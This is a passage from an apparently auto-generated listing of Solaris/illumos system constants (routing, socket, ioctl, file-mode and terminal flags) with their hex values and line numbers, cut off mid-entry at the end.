RTAX_BRD = 0x7 constant RTAX_DST (line 751) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 752) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 753) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 754) | RTAX_IFA = 0x5 constant RTAX_IFP (line 755) | RTAX_IFP = 0x4 constant RTAX_MAX (line 756) | RTAX_MAX = 0x9 constant RTAX_NETMASK (line 757) | RTAX_NETMASK = 0x2 constant RTAX_SRC (line 758) | RTAX_SRC = 0x8 constant RTA_AUTHOR (line 759) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 760) | RTA_BRD = 0x80 constant RTA_DST (line 761) | RTA_DST = 0x1 constant RTA_GATEWAY (line 762) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 763) | RTA_GENMASK = 0x8 constant RTA_IFA (line 764) | RTA_IFA = 0x20 constant RTA_IFP (line 765) | RTA_IFP = 0x10 constant RTA_NETMASK (line 766) | RTA_NETMASK = 0x4 constant RTA_NUMBITS (line 767) | RTA_NUMBITS = 0x9 constant RTA_SRC (line 768) | RTA_SRC = 0x100 constant RTF_BLACKHOLE (line 769) | RTF_BLACKHOLE = 0x1000 constant RTF_CLONING (line 770) | RTF_CLONING = 0x100 constant RTF_DONE (line 771) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 772) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 773) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 774) | RTF_HOST = 0x4 constant RTF_INDIRECT (line 775) | RTF_INDIRECT = 0x40000 constant RTF_KERNEL (line 776) | RTF_KERNEL = 0x80000 constant RTF_LLINFO (line 777) | RTF_LLINFO = 0x400 constant RTF_MASK (line 778) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 779) | RTF_MODIFIED = 0x20 constant RTF_MULTIRT (line 780) | RTF_MULTIRT = 0x10000 constant RTF_PRIVATE (line 781) | RTF_PRIVATE = 0x2000 constant RTF_PROTO1 (line 782) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 783) | RTF_PROTO2 = 0x4000 constant RTF_REJECT (line 784) | RTF_REJECT = 0x8 constant RTF_SETSRC (line 785) | RTF_SETSRC = 0x20000 constant RTF_STATIC (line 786) | RTF_STATIC = 0x800 constant RTF_UP (line 787) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 788) | RTF_XRESOLVE = 0x200 constant RTF_ZONE (line 789) | RTF_ZONE = 0x100000 constant RTM_ADD (line 790) | RTM_ADD = 0x1 constant RTM_CHANGE (line 791) | RTM_CHANGE = 0x3 constant RTM_CHGADDR (line 792) | RTM_CHGADDR = 0xf constant RTM_DELADDR (line 793) | RTM_DELADDR = 0xd constant RTM_DELETE (line 794) | RTM_DELETE = 0x2 constant RTM_FREEADDR (line 795) | RTM_FREEADDR = 0x10 constant RTM_GET (line 796) | RTM_GET = 0x4 constant RTM_IFINFO (line 797) | RTM_IFINFO = 0xe constant RTM_LOCK (line 798) | RTM_LOCK = 0x8 constant RTM_LOSING (line 799) | RTM_LOSING = 0x5 constant RTM_MISS (line 800) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 801) | RTM_NEWADDR = 0xc constant RTM_OLDADD (line 802) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 803) | RTM_OLDDEL = 0xa constant RTM_REDIRECT (line 804) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 805) | RTM_RESOLVE = 0xb constant RTM_VERSION (line 806) | RTM_VERSION = 0x3 constant RTV_EXPIRE (line 807) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 808) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 809) | RTV_MTU = 0x1 constant RTV_RPIPE (line 810) | RTV_RPIPE = 0x8 constant RTV_RTT (line 811) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 812) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 813) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 814) | RTV_SSTHRESH = 0x20 constant RT_AWARE (line 815) | RT_AWARE = 0x1 constant RUSAGE_CHILDREN (line 816) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 817) | RUSAGE_SELF = 0x0 constant SCM_RIGHTS (line 818) | SCM_RIGHTS = 0x1010 constant SCM_TIMESTAMP (line 819) | SCM_TIMESTAMP = 0x1013 constant SCM_UCRED (line 820) | SCM_UCRED = 0x1012 constant SHUT_RD (line 821) | SHUT_RD = 0x0 constant SHUT_RDWR (line 822) | SHUT_RDWR = 0x2 constant SHUT_WR (line 823) | SHUT_WR = 0x1 constant SIG2STR_MAX (line 824) | SIG2STR_MAX = 0x20 constant SIOCADDMULTI (line 825) | SIOCADDMULTI = -0x7fdf96cf constant SIOCADDRT (line 826) | SIOCADDRT = -0x7fcf8df6 constant SIOCATMARK (line 827) | SIOCATMARK = 0x40047307 constant SIOCDARP (line 828) | SIOCDARP = -0x7fdb96e0 constant SIOCDELMULTI (line 829) | SIOCDELMULTI = -0x7fdf96ce constant SIOCDELRT (line 830) | SIOCDELRT = -0x7fcf8df5 constant SIOCDXARP (line 831) | SIOCDXARP = -0x7fff9658 constant SIOCGARP (line 832) | SIOCGARP = -0x3fdb96e1 constant SIOCGDSTINFO (line 833) | SIOCGDSTINFO = -0x3fff965c constant SIOCGENADDR (line 834) | SIOCGENADDR = -0x3fdf96ab constant SIOCGENPSTATS (line 835) | SIOCGENPSTATS = -0x3fdf96c7 constant SIOCGETLSGCNT (line 836) | SIOCGETLSGCNT = -0x3fef8deb constant SIOCGETNAME (line 837) | SIOCGETNAME = 0x40107334 constant SIOCGETPEER (line 838) | SIOCGETPEER = 0x40107335 constant SIOCGETPROP (line 839) | SIOCGETPROP = -0x3fff8f44 constant SIOCGETSGCNT (line 840) | SIOCGETSGCNT = -0x3feb8deb constant SIOCGETSYNC (line 841) | SIOCGETSYNC = -0x3fdf96d3 constant SIOCGETVIFCNT (line 842) | SIOCGETVIFCNT = -0x3feb8dec constant SIOCGHIWAT (line 843) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 844) | SIOCGIFADDR = -0x3fdf96f3 constant SIOCGIFBRDADDR (line 845) | SIOCGIFBRDADDR = -0x3fdf96e9 constant SIOCGIFCONF (line 846) | SIOCGIFCONF = -0x3ff796a4 constant SIOCGIFDSTADDR (line 847) | SIOCGIFDSTADDR = -0x3fdf96f1 constant SIOCGIFFLAGS (line 848) | SIOCGIFFLAGS = -0x3fdf96ef constant SIOCGIFHWADDR (line 849) | SIOCGIFHWADDR = -0x3fdf9647 constant SIOCGIFINDEX (line 850) | SIOCGIFINDEX = -0x3fdf96a6 constant SIOCGIFMEM (line 851) | SIOCGIFMEM = -0x3fdf96ed constant SIOCGIFMETRIC (line 852) | SIOCGIFMETRIC = -0x3fdf96e5 constant SIOCGIFMTU (line 853) | SIOCGIFMTU = -0x3fdf96ea constant SIOCGIFMUXID (line 854) | SIOCGIFMUXID = -0x3fdf96a8 constant SIOCGIFNETMASK (line 855) | SIOCGIFNETMASK = -0x3fdf96e7 constant SIOCGIFNUM (line 856) | SIOCGIFNUM = 0x40046957 constant SIOCGIP6ADDRPOLICY (line 857) | SIOCGIP6ADDRPOLICY = -0x3fff965e constant SIOCGIPMSFILTER (line 858) | SIOCGIPMSFILTER = -0x3ffb964c constant SIOCGLIFADDR (line 859) | SIOCGLIFADDR = -0x3f87968f constant SIOCGLIFBINDING (line 860) | SIOCGLIFBINDING = -0x3f879666 constant SIOCGLIFBRDADDR (line 861) | SIOCGLIFBRDADDR = -0x3f879685 constant SIOCGLIFCONF (line 862) | SIOCGLIFCONF = -0x3fef965b constant SIOCGLIFDADSTATE (line 863) | SIOCGLIFDADSTATE = -0x3f879642 constant SIOCGLIFDSTADDR (line 864) | SIOCGLIFDSTADDR = -0x3f87968d constant SIOCGLIFFLAGS (line 865) | SIOCGLIFFLAGS = -0x3f87968b constant SIOCGLIFGROUPINFO (line 866) | SIOCGLIFGROUPINFO = -0x3f4b9663 constant SIOCGLIFGROUPNAME (line 867) | SIOCGLIFGROUPNAME = -0x3f879664 constant SIOCGLIFHWADDR (line 868) | SIOCGLIFHWADDR = -0x3f879640 constant SIOCGLIFINDEX (line 869) | SIOCGLIFINDEX = -0x3f87967b constant SIOCGLIFLNKINFO (line 870) | SIOCGLIFLNKINFO = -0x3f879674 constant SIOCGLIFMETRIC (line 871) | SIOCGLIFMETRIC = -0x3f879681 constant SIOCGLIFMTU (line 872) | SIOCGLIFMTU = -0x3f879686 constant SIOCGLIFMUXID (line 873) | SIOCGLIFMUXID = -0x3f87967d constant SIOCGLIFNETMASK (line 874) | SIOCGLIFNETMASK = -0x3f879683 constant SIOCGLIFNUM (line 875) | SIOCGLIFNUM = -0x3ff3967e constant SIOCGLIFSRCOF (line 876) | SIOCGLIFSRCOF = -0x3fef964f constant SIOCGLIFSUBNET (line 877) | SIOCGLIFSUBNET = -0x3f879676 constant SIOCGLIFTOKEN (line 878) | SIOCGLIFTOKEN = -0x3f879678 constant SIOCGLIFUSESRC (line 879) | SIOCGLIFUSESRC = -0x3f879651 constant SIOCGLIFZONE (line 880) | SIOCGLIFZONE = -0x3f879656 constant SIOCGLOWAT (line 881) | SIOCGLOWAT = 0x40047303 constant SIOCGMSFILTER (line 882) | SIOCGMSFILTER = -0x3ffb964e constant SIOCGPGRP (line 883) | SIOCGPGRP = 0x40047309 constant SIOCGSTAMP (line 884) | SIOCGSTAMP = -0x3fef9646 constant SIOCGXARP (line 885) | SIOCGXARP = -0x3fff9659 constant SIOCIFDETACH (line 886) | SIOCIFDETACH = -0x7fdf96c8 constant SIOCILB (line 887) | SIOCILB = -0x3ffb9645 constant SIOCLIFADDIF (line 888) | SIOCLIFADDIF = -0x3f879691 constant SIOCLIFDELND (line 889) | SIOCLIFDELND = -0x7f879673 constant SIOCLIFGETND (line 890) | SIOCLIFGETND = -0x3f879672 constant SIOCLIFREMOVEIF (line 891) | SIOCLIFREMOVEIF = -0x7f879692 constant SIOCLIFSETND (line 892) | SIOCLIFSETND = -0x7f879671 constant SIOCLOWER (line 893) | SIOCLOWER = -0x7fdf96d7 constant SIOCSARP (line 894) | SIOCSARP = -0x7fdb96e2 constant SIOCSCTPGOPT (line 895) | SIOCSCTPGOPT = -0x3fef9653 constant SIOCSCTPPEELOFF (line 896) | SIOCSCTPPEELOFF = -0x3ffb9652 constant SIOCSCTPSOPT (line 897) | SIOCSCTPSOPT = -0x7fef9654 constant SIOCSENABLESDP (line 898) | SIOCSENABLESDP = -0x3ffb9649 constant SIOCSETPROP (line 899) | SIOCSETPROP = -0x7ffb8f43 constant SIOCSETSYNC (line 900) | SIOCSETSYNC = -0x7fdf96d4 constant SIOCSHIWAT (line 901) | SIOCSHIWAT = -0x7ffb8d00 constant SIOCSIFADDR (line 902) | SIOCSIFADDR = -0x7fdf96f4 constant SIOCSIFBRDADDR (line 903) | SIOCSIFBRDADDR = -0x7fdf96e8 constant SIOCSIFDSTADDR (line 904) | SIOCSIFDSTADDR = -0x7fdf96f2 constant SIOCSIFFLAGS (line 905) | SIOCSIFFLAGS = -0x7fdf96f0 constant SIOCSIFINDEX (line 906) | SIOCSIFINDEX = -0x7fdf96a5 constant SIOCSIFMEM (line 907) | SIOCSIFMEM = -0x7fdf96ee constant SIOCSIFMETRIC (line 908) | SIOCSIFMETRIC = -0x7fdf96e4 constant SIOCSIFMTU (line 909) | SIOCSIFMTU = -0x7fdf96eb constant SIOCSIFMUXID (line 910) | SIOCSIFMUXID = -0x7fdf96a7 constant SIOCSIFNAME (line 911) | SIOCSIFNAME = -0x7fdf96b7 constant SIOCSIFNETMASK (line 912) | SIOCSIFNETMASK = -0x7fdf96e6 constant SIOCSIP6ADDRPOLICY (line 913) | SIOCSIP6ADDRPOLICY = -0x7fff965d constant SIOCSIPMSFILTER (line 914) | SIOCSIPMSFILTER = -0x7ffb964b constant SIOCSLGETREQ (line 915) | SIOCSLGETREQ = -0x3fdf96b9 constant SIOCSLIFADDR (line 916) | SIOCSLIFADDR = -0x7f879690 constant SIOCSLIFBRDADDR (line 917) | SIOCSLIFBRDADDR = -0x7f879684 constant SIOCSLIFDSTADDR (line 918) | SIOCSLIFDSTADDR = -0x7f87968e constant SIOCSLIFFLAGS (line 919) | SIOCSLIFFLAGS = -0x7f87968c constant SIOCSLIFGROUPNAME (line 920) | SIOCSLIFGROUPNAME = -0x7f879665 constant SIOCSLIFINDEX (line 921) | SIOCSLIFINDEX = -0x7f87967a constant SIOCSLIFLNKINFO (line 922) | SIOCSLIFLNKINFO = -0x7f879675 constant SIOCSLIFMETRIC (line 923) | SIOCSLIFMETRIC = -0x7f879680 constant SIOCSLIFMTU (line 924) | SIOCSLIFMTU = -0x7f879687 constant SIOCSLIFMUXID (line 925) | SIOCSLIFMUXID = -0x7f87967c constant SIOCSLIFNAME (line 926) | SIOCSLIFNAME = -0x3f87967f constant SIOCSLIFNETMASK (line 927) | SIOCSLIFNETMASK = -0x7f879682 constant SIOCSLIFPREFIX (line 928) | SIOCSLIFPREFIX = -0x3f879641 constant SIOCSLIFSUBNET (line 929) | SIOCSLIFSUBNET = -0x7f879677 constant SIOCSLIFTOKEN (line 930) | SIOCSLIFTOKEN = -0x7f879679 constant SIOCSLIFUSESRC (line 931) | SIOCSLIFUSESRC = -0x7f879650 constant SIOCSLIFZONE (line 932) | SIOCSLIFZONE = -0x7f879655 constant SIOCSLOWAT (line 933) | SIOCSLOWAT = -0x7ffb8cfe constant SIOCSLSTAT (line 934) | SIOCSLSTAT = -0x7fdf96b8 constant SIOCSMSFILTER (line 935) | SIOCSMSFILTER = -0x7ffb964d constant SIOCSPGRP (line 936) | SIOCSPGRP = -0x7ffb8cf8 constant SIOCSPROMISC (line 937) | SIOCSPROMISC = -0x7ffb96d0 constant SIOCSQPTR (line 938) | SIOCSQPTR = -0x3ffb9648 constant SIOCSSDSTATS (line 939) | SIOCSSDSTATS = -0x3fdf96d2 constant SIOCSSESTATS (line 940) | SIOCSSESTATS = -0x3fdf96d1 constant SIOCSXARP (line 941) | SIOCSXARP = -0x7fff965a constant SIOCTMYADDR (line 942) | SIOCTMYADDR = -0x3ff79670 constant SIOCTMYSITE (line 943) | SIOCTMYSITE = -0x3ff7966e constant SIOCTONLINK (line 944) | SIOCTONLINK = -0x3ff7966f constant SIOCUPPER (line 945) | SIOCUPPER = -0x7fdf96d8 constant SIOCX25RCV (line 946) | SIOCX25RCV = -0x3fdf96c4 constant SIOCX25TBL (line 947) | SIOCX25TBL = -0x3fdf96c3 constant SIOCX25XMT (line 948) | SIOCX25XMT = -0x3fdf96c5 constant SIOCXPROTO (line 949) | SIOCXPROTO = 0x20007337 constant SOCK_CLOEXEC (line 950) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 951) | SOCK_DGRAM = 0x1 constant SOCK_NDELAY (line 952) | SOCK_NDELAY = 0x200000 constant SOCK_NONBLOCK (line 953) | SOCK_NONBLOCK = 0x100000 constant SOCK_RAW (line 954) | SOCK_RAW = 0x4 constant SOCK_RDM (line 955) | SOCK_RDM = 0x5 constant SOCK_SEQPACKET (line 956) | SOCK_SEQPACKET = 0x6 constant SOCK_STREAM (line 957) | SOCK_STREAM = 0x2 constant SOCK_TYPE_MASK (line 958) | SOCK_TYPE_MASK = 0xffff constant SOL_FILTER (line 959) | SOL_FILTER = 0xfffc constant SOL_PACKET (line 960) | SOL_PACKET = 0xfffd constant SOL_ROUTE (line 961) | SOL_ROUTE = 0xfffe constant SOL_SOCKET (line 962) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 963) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 964) | SO_ACCEPTCONN = 0x2 constant SO_ALL (line 965) | SO_ALL = 0x3f constant SO_ALLZONES (line 966) | SO_ALLZONES = 0x1014 constant SO_ANON_MLP (line 967) | SO_ANON_MLP = 0x100a constant SO_ATTACH_FILTER (line 968) | SO_ATTACH_FILTER = 0x40000001 constant SO_BAND (line 969) | SO_BAND = 0x4000 constant SO_BROADCAST (line 970) | SO_BROADCAST = 0x20 constant SO_COPYOPT (line 971) | SO_COPYOPT = 0x80000 constant SO_DEBUG (line 972) | SO_DEBUG = 0x1 constant SO_DELIM (line 973) | SO_DELIM = 0x8000 constant SO_DETACH_FILTER (line 974) | SO_DETACH_FILTER = 0x40000002 constant SO_DGRAM_ERRIND (line 975) | SO_DGRAM_ERRIND = 0x200 constant SO_DOMAIN (line 976) | SO_DOMAIN = 0x100c constant SO_DONTLINGER (line 977) | SO_DONTLINGER = -0x81 constant SO_DONTROUTE (line 978) | SO_DONTROUTE = 0x10 constant SO_ERROPT (line 979) | SO_ERROPT = 0x40000 constant SO_ERROR (line 980) | SO_ERROR = 0x1007 constant SO_EXCLBIND (line 981) | SO_EXCLBIND = 0x1015 constant SO_HIWAT (line 982) | SO_HIWAT = 0x10 constant SO_ISNTTY (line 983) | SO_ISNTTY = 0x800 constant SO_ISTTY (line 984) | SO_ISTTY = 0x400 constant SO_KEEPALIVE (line 985) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 986) | SO_LINGER = 0x80 constant SO_LOWAT (line 987) | SO_LOWAT = 0x20 constant SO_MAC_EXEMPT (line 988) | SO_MAC_EXEMPT = 0x100b constant SO_MAC_IMPLICIT (line 989) | SO_MAC_IMPLICIT = 0x1016 constant SO_MAXBLK (line 990) | SO_MAXBLK = 0x100000 constant SO_MAXPSZ (line 991) | SO_MAXPSZ = 0x8 constant SO_MINPSZ (line 992) | SO_MINPSZ = 0x4 constant SO_MREADOFF (line 993) | SO_MREADOFF = 0x80 constant SO_MREADON (line 994) | SO_MREADON = 0x40 constant SO_NDELOFF (line 995) | SO_NDELOFF = 0x200 constant SO_NDELON (line 996) | SO_NDELON = 0x100 constant SO_NODELIM (line 997) | SO_NODELIM = 0x10000 constant SO_OOBINLINE (line 998) | SO_OOBINLINE = 0x100 constant SO_PROTOTYPE (line 999) | SO_PROTOTYPE = 0x1009 constant SO_RCVBUF (line 1000) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1001) | SO_RCVLOWAT = 0x1004 constant SO_RCVPSH (line 1002) | SO_RCVPSH = 0x100d constant SO_RCVTIMEO (line 1003) | SO_RCVTIMEO = 0x1006 constant SO_READOPT (line 1004) | SO_READOPT = 0x1 constant SO_RECVUCRED (line 1005) | SO_RECVUCRED = 0x400 constant SO_REUSEADDR (line 1006) | SO_REUSEADDR = 0x4 constant SO_SECATTR (line 1007) | SO_SECATTR = 0x1011 constant SO_SNDBUF (line 1008) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1009) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1010) | SO_SNDTIMEO = 0x1005 constant SO_STRHOLD (line 1011) | SO_STRHOLD = 0x20000 constant SO_TAIL (line 1012) | SO_TAIL = 0x200000 constant SO_TIMESTAMP (line 1013) | SO_TIMESTAMP = 0x1013 constant SO_TONSTOP (line 1014) | SO_TONSTOP = 0x2000 constant SO_TOSTOP (line 1015) | SO_TOSTOP = 0x1000 constant SO_TYPE (line 1016) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1017) | SO_USELOOPBACK = 0x40 constant SO_VRRP (line 1018) | SO_VRRP = 0x1017 constant SO_WROFF (line 1019) | SO_WROFF = 0x2 constant S_ENFMT (line 1020) | S_ENFMT = 0x400 constant S_IAMB (line 1021) | S_IAMB = 0x1ff constant S_IEXEC (line 1022) | S_IEXEC = 0x40 constant S_IFBLK (line 1023) | S_IFBLK = 0x6000 constant S_IFCHR (line 1024) | S_IFCHR = 0x2000 constant S_IFDIR (line 1025) | S_IFDIR = 0x4000 constant S_IFDOOR (line 1026) | S_IFDOOR = 0xd000 constant S_IFIFO (line 1027) | S_IFIFO = 0x1000 constant S_IFLNK (line 1028) | S_IFLNK = 0xa000 constant S_IFMT (line 1029) | S_IFMT = 0xf000 constant S_IFNAM (line 1030) | S_IFNAM = 0x5000 constant S_IFPORT (line 1031) | S_IFPORT = 0xe000 constant S_IFREG (line 1032) | S_IFREG = 0x8000 constant S_IFSOCK (line 1033) | S_IFSOCK = 0xc000 constant S_INSEM (line 1034) | S_INSEM = 0x1 constant S_INSHD (line 1035) | S_INSHD = 0x2 constant S_IREAD (line 1036) | S_IREAD = 0x100 constant S_IRGRP (line 1037) | S_IRGRP = 0x20 constant S_IROTH (line 1038) | S_IROTH = 0x4 constant S_IRUSR (line 1039) | S_IRUSR = 0x100 constant S_IRWXG (line 1040) | S_IRWXG = 0x38 constant S_IRWXO (line 1041) | S_IRWXO = 0x7 constant S_IRWXU (line 1042) | S_IRWXU = 0x1c0 constant S_ISGID (line 1043) | S_ISGID = 0x400 constant S_ISUID (line 1044) | S_ISUID = 0x800 constant S_ISVTX (line 1045) | S_ISVTX = 0x200 constant S_IWGRP (line 1046) | S_IWGRP = 0x10 constant S_IWOTH (line 1047) | S_IWOTH = 0x2 constant S_IWRITE (line 1048) | S_IWRITE = 0x80 constant S_IWUSR (line 1049) | S_IWUSR = 0x80 constant S_IXGRP (line 1050) | S_IXGRP = 0x8 constant S_IXOTH (line 1051) | S_IXOTH = 0x1 constant S_IXUSR (line 1052) | S_IXUSR = 0x40 constant TAB0 (line 1053) | TAB0 = 0x0 constant TAB1 (line 1054) | TAB1 = 0x800 constant TAB2 (line 1055) | TAB2 = 0x1000 constant TAB3 (line 1056) | TAB3 = 0x1800 constant TABDLY (line 1057) | TABDLY = 0x1800 constant TCFLSH (line 1058) | TCFLSH = 0x5407 constant TCGETA (line 1059) | TCGETA = 0x5401 constant TCGETS (line 1060) | TCGETS = 0x540d constant TCIFLUSH (line 1061) | TCIFLUSH = 0x0 constant TCIOFF (line 1062) | TCIOFF = 0x2 constant TCIOFLUSH (line 1063) | TCIOFLUSH = 0x2 constant TCION (line 1064) | TCION = 0x3 constant TCOFLUSH (line 1065) | TCOFLUSH = 0x1 constant TCOOFF (line 1066) | TCOOFF = 0x0 constant TCOON (line 1067) | TCOON = 0x1 constant TCP_ABORT_THRESHOLD (line 1068) | TCP_ABORT_THRESHOLD = 0x11 constant TCP_ANONPRIVBIND (line 1069) | TCP_ANONPRIVBIND = 0x20 constant TCP_CONGESTION (line 1070) | TCP_CONGESTION = 0x25 constant TCP_CONN_ABORT_THRESHOLD (line 1071) | TCP_CONN_ABORT_THRESHOLD = 0x13 constant TCP_CONN_NOTIFY_THRESHOLD (line 1072) | TCP_CONN_NOTIFY_THRESHOLD = 0x12 constant TCP_CORK (line 1073) | TCP_CORK = 0x18 constant TCP_EXCLBIND (line 1074) | TCP_EXCLBIND = 0x21 constant TCP_INIT_CWND (line 1075) | TCP_INIT_CWND = 0x15 constant TCP_KEEPALIVE (line 1076) | TCP_KEEPALIVE = 0x8 constant TCP_KEEPALIVE_ABORT_THRESHOLD (line 1077) | TCP_KEEPALIVE_ABORT_THRESHOLD = 0x17 constant TCP_KEEPALIVE_THRESHOLD (line 1078) | TCP_KEEPALIVE_THRESHOLD = 0x16 constant TCP_KEEPCNT (line 1079) | TCP_KEEPCNT = 0x23 constant TCP_KEEPIDLE (line 1080) | TCP_KEEPIDLE = 0x22 constant TCP_KEEPINTVL (line 1081) | TCP_KEEPINTVL = 0x24 constant TCP_LINGER2 (line 1082) | TCP_LINGER2 = 0x1c constant TCP_MAXSEG (line 1083) | TCP_MAXSEG = 0x2 constant TCP_MSS (line 1084) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1085) | TCP_NODELAY = 0x1 constant TCP_NOTIFY_THRESHOLD (line 1086) | TCP_NOTIFY_THRESHOLD = 0x10 constant TCP_RECVDSTADDR (line 1087) | TCP_RECVDSTADDR = 0x14 constant TCP_RTO_INITIAL (line 1088) | TCP_RTO_INITIAL = 0x19 constant TCP_RTO_MAX (line 1089) | TCP_RTO_MAX = 0x1b constant TCP_RTO_MIN (line 1090) | TCP_RTO_MIN = 0x1a constant TCSAFLUSH (line 1091) | TCSAFLUSH = 0x5410 constant TCSBRK (line 1092) | TCSBRK = 0x5405 constant TCSETA (line 1093) | TCSETA = 0x5402 constant TCSETAF (line 1094) | TCSETAF = 0x5404 constant TCSETAW (line 1095) | TCSETAW = 0x5403 constant TCSETS (line 1096) | TCSETS = 0x540e constant TCSETSF (line 1097) | TCSETSF = 0x5410 constant TCSETSW (line 1098) | TCSETSW = 0x540f constant TCXONC (line 1099) | TCXONC = 0x5406 constant TIMER_ABSTIME (line 1100) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1101) | TIMER_RELTIME = 0x0 constant TIOC (line 1102) | TIOC = 0x5400 constant TIOCCBRK (line 1103) | TIOCCBRK = 0x747a constant TIOCCDTR (line 1104) | TIOCCDTR = 0x7478 constant TIOCCILOOP (line 1105) | TIOCCILOOP = 0x746c constant TIOCEXCL (line 1106) | TIOCEXCL = 0x740d constant TIOCFLUSH (line 1107) | TIOCFLUSH = 0x7410 constant TIOCGETC (line 1108) | TIOCGETC = 0x7412 constant TIOCGETD (line 1109) | TIOCGETD = 0x7400 constant TIOCGETP (line 1110) | TIOCGETP = 0x7408 constant TIOCGLTC (line 1111) | TIOCGLTC = 0x7474 constant TIOCGPGRP (line 1112) | TIOCGPGRP = 0x7414 constant TIOCGPPS (line 1113) | TIOCGPPS = 0x547d constant TIOCGPPSEV (line 1114) | TIOCGPPSEV = 0x547f constant TIOCGSID (line 1115) | TIOCGSID = 0x7416 constant TIOCGSOFTCAR (line 1116) | TIOCGSOFTCAR = 0x5469 constant TIOCGWINSZ (line 1117) | TIOCGWINSZ = 0x5468 constant TIOCHPCL (line 1118) | TIOCHPCL = 0x7402 constant TIOCKBOF (line 1119) | TIOCKBOF = 0x5409 constant TIOCKBON (line 1120) | TIOCKBON = 0x5408 constant TIOCLBIC (line 1121) | TIOCLBIC = 0x747e constant TIOCLBIS (line 1122) | TIOCLBIS = 0x747f constant TIOCLGET (line 1123) | TIOCLGET = 0x747c constant TIOCLSET (line 1124) | TIOCLSET = 0x747d constant TIOCMBIC (line 1125) | TIOCMBIC = 0x741c constant TIOCMBIS (line 1126) | TIOCMBIS = 0x741b constant TIOCMGET (line 1127) | TIOCMGET = 0x741d constant TIOCMSET (line 1128) | TIOCMSET = 0x741a constant TIOCM_CAR (line 1129) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1130) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1131) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1132) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1133) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1134) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1135) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1136) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1137) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1138) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1139) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1140) | TIOCNOTTY = 0x7471 constant TIOCNXCL (line 1141) | TIOCNXCL = 0x740e constant TIOCOUTQ (line 1142) | TIOCOUTQ = 0x7473 constant TIOCREMOTE (line 1143) | TIOCREMOTE = 0x741e constant TIOCSBRK (line 1144) | TIOCSBRK = 0x747b constant TIOCSCTTY (line 1145) | TIOCSCTTY = 0x7484 constant TIOCSDTR (line 1146) | TIOCSDTR = 0x7479 constant TIOCSETC (line 1147) | TIOCSETC = 0x7411 constant TIOCSETD (line 1148) | TIOCSETD = 0x7401 constant TIOCSETN (line 1149) | TIOCSETN = 0x740a constant TIOCSETP (line 1150) | TIOCSETP = 0x7409 constant TIOCSIGNAL (line 1151) | TIOCSIGNAL = 0x741f constant TIOCSILOOP (line 1152) | TIOCSILOOP = 0x746d constant TIOCSLTC (line 1153) | TIOCSLTC = 0x7475 constant TIOCSPGRP (line 1154) | TIOCSPGRP = 0x7415 constant TIOCSPPS (line 1155) | TIOCSPPS = 0x547e constant TIOCSSOFTCAR (line 1156) | TIOCSSOFTCAR = 0x546a constant TIOCSTART (line 1157) | TIOCSTART = 0x746e constant TIOCSTI (line 1158) | TIOCSTI = 0x7417 constant TIOCSTOP (line 1159) | TIOCSTOP = 0x746f constant TIOCSWINSZ (line 1160) | TIOCSWINSZ = 0x5467 constant TOSTOP (line 1161) | TOSTOP = 0x100 constant UTIME_NOW (line 1162) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1163) | UTIME_OMIT = -0x2 constant VCEOF (line 1164) | VCEOF = 0x8 constant VCEOL (line 1165) | VCEOL = 0x9 constant VDISCARD (line 1166) | VDISCARD = 0xd constant VDSUSP (line 1167) | VDSUSP = 0xb constant VEOF (line 1168) | VEOF = 0x4 constant VEOL (line 1169) | VEOL = 0x5 constant VEOL2 (line 1170) | VEOL2 = 0x6 constant VERASE (line 1171) | VERASE = 0x2 constant VERASE2 (line 1172) | VERASE2 = 0x11 constant VINTR (line 1173) | VINTR = 0x0 constant VKILL (line 1174) | VKILL = 0x3 constant VLNEXT (line 1175) | VLNEXT = 0xf constant VMIN (line 1176) | VMIN = 0x4 constant VQUIT (line 1177) | VQUIT = 0x1 constant VREPRINT (line 1178) | VREPRINT = 0xc constant VSTART (line 1179) | VSTART = 0x8 constant VSTATUS (line 1180) | VSTATUS = 0x10 constant VSTOP (line 1181) | VSTOP = 0x9 constant VSUSP (line 1182) | VSUSP = 0xa constant VSWTCH (line 1183) | VSWTCH = 0x7 constant VT0 (line 1184) | VT0 = 0x0 constant VT1 (line 1185) | VT1 = 0x4000 constant VTDLY (line 1186) | VTDLY = 0x4000 constant VTIME (line 1187) | VTIME = 0x5 constant VWERASE (line 1188) | VWERASE = 